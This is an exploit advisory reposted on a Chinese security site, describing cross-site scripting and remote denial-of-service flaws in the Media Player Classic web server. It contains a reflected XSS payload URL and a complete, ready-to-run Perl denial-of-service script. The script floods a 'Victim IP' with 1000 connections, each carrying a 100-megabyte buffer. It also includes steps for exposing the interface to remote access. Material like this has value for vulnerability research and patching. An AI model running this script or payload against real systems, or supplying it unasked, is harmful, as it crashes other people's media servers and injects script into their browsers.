首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Media Player Classic XSS / Denial Of Service
来源:vfocus.net 作者:X-Cisadane 发布时间:2012-11-19  
========================================================================================== 
MPC (Media Player Classic) WebServer Multiple Vulnerabilities 
==========================================================================================
 
:------------------------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : MPC (Media Player Classic) WebServer Multiple Vulnerabilities 
: # Date : 16 November 2012 
: # Author : X-Cisadane 
: # Download : http://mpc-hc.sourceforge.net/downloads/ OR Download K-Lite Mega Codec Pack http://codecguide.com/download_mega.htm 
: # Version : ALL 
: # Category : Web Applications 
: # Vulnerability : XSS Vulnerability and Remote Denial of Service Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English) 
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari 
:------------------------------------------------------------------------------------------------------------------------------------:
WHAT IS MPC WebServer? 
====================== 
Media Player Classic (MPC) is a compact free software media player for Microsoft Windows. The application mimics the look and feel of the old, 
light-weight Windows Media Player 6.4 but uses a completely different codebase, integrating most options and features found in modern media players. 
Media Player Classic (MPC) WebServer is part of Media Player Classic features that is a web based Remote control. You can controlling Media Player Classic from your Web Browser.


HOW TO ACTIVATE MPC WebServer?
==============================
Make sure you have installed Media Player Classic or K-Lite Mega Codec Pack. Run your Media Player Classic, click 'View' Menu from the Menu Bar then choose 'Options...'.
In the Options Window, choose Web Interface. Enable “Listen on port”, Disable “Allow access from localhost only”. 
You can change the port it listens on but that’s optional (default is 13579). Apply and click 'Launch in web browser...' Or Access it from http://localhost:13579/ OR http://IP:13579/. 
PIC MPC WebServer : http://i48.tinypic.com/33xfomg.png
 

PROOF OF CONCEPT 
=================

[1] Non Persistent XSS (Tested On Mozilla Firefox 16.0.2) 

Vulnerable URL : http://IP:Port/browser.html?path=[XSS]
Example : http://localhost:13579/browser.html?path=<script>alert("XSS")</script>

PIC XSS : http://i45.tinypic.com/4j3uz4.png

[2] Remote Denial of Service (Using Perl Script)
C:\xampp\perl\bin>perl exploitmpc.pl 127.0.0.1 13579
        *=============================================================*
        * ---   MPC WebServer Remote Denial Of Service             ---*
        * ---               By : X-Cisadane                        ---*
        * ---  ------------------------------------------------    ---*
        * ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*
        * ---                                                      ---*
        *=============================================================*

Ex : perl exploitmpc.pl 127.0.0.1 13579
Default Port for MPC Web Server is 13579
Please Wait Till Buffer is Done 
Attacking the Target, Please Wait Till Pwned

PIC Remote DoS : http://i46.tinypic.com/15egs5j.png

-------------------------------- [ Code ] --------------------------------------------
#!/usr/bin/perl
use IO::Socket::INET;
use Getopt::Std;
use Socket;
my $SOCKET = "";
$loop = 1000;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print "\t*=============================================================*\n";
print "\t* ---  	MPC WebServer Remote Denial Of Service             ---*\n";
print "\t* ---  		    By : X-Cisadane                        ---*\n";
print "\t* ---  ------------------------------------------------    ---*\n";
print "\t* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*\n";
print "\t* ---                                                      ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n"; 
print "Default Port for MPC Web Server is 13579\n";
  
exit;
}
 
print "\t*=============================================================*\n";
print "\t* ---  	MPC WebServer Remote Denial Of Service             ---*\n";
print "\t* ---  		    By : X-Cisadane                        ---*\n";
print "\t* ---  ------------------------------------------------    ---*\n";
print "\t* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*\n";
print "\t* ---                                                      ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n"; 
print "Default Port for MPC Web Server is 13579\n";
print "\n"; 
print " Please Wait Till The Buffer is Done\n";
my $b1 = "\x41" x 100000000;

$iaddr = inet_aton($ip) || die "Unknown host: $ip\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";

print "\n";
print " Attacking the Target, Please Wait Till Pwned \n";
 
for ($j=1;$j<$loop;$j++) { 
socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n";
 
$DoS=IO::Socket::INET->new("$ip:$port") or die;
send(SOCKET,$b1, 0) || die "failure sent: $!\n";
 
print $DoS "stor $b1\n";
print $DoS "QUIT\n";
 
close $DoS;
close SOCKET; 
}
# exit :

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Broadcom DoS on BCM4325 and BC
·NFR Agent FSFUI Record File Up
·Oracle Database Client System
·FormatFactory v3.0.1 Profile F
·Novell NetIQ Privileged User M
·LAN.FS Messenger v2.4 Command
·Novell NetIQ Privileged User M
·Akeni LAN 1.2.118 Filter Bypas
·Novell Groupwise Internet Agen
·Narcissus Image Configuration
·Huawei Quidway / Huawei CX600
·NetIQ Privileged User Manager
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved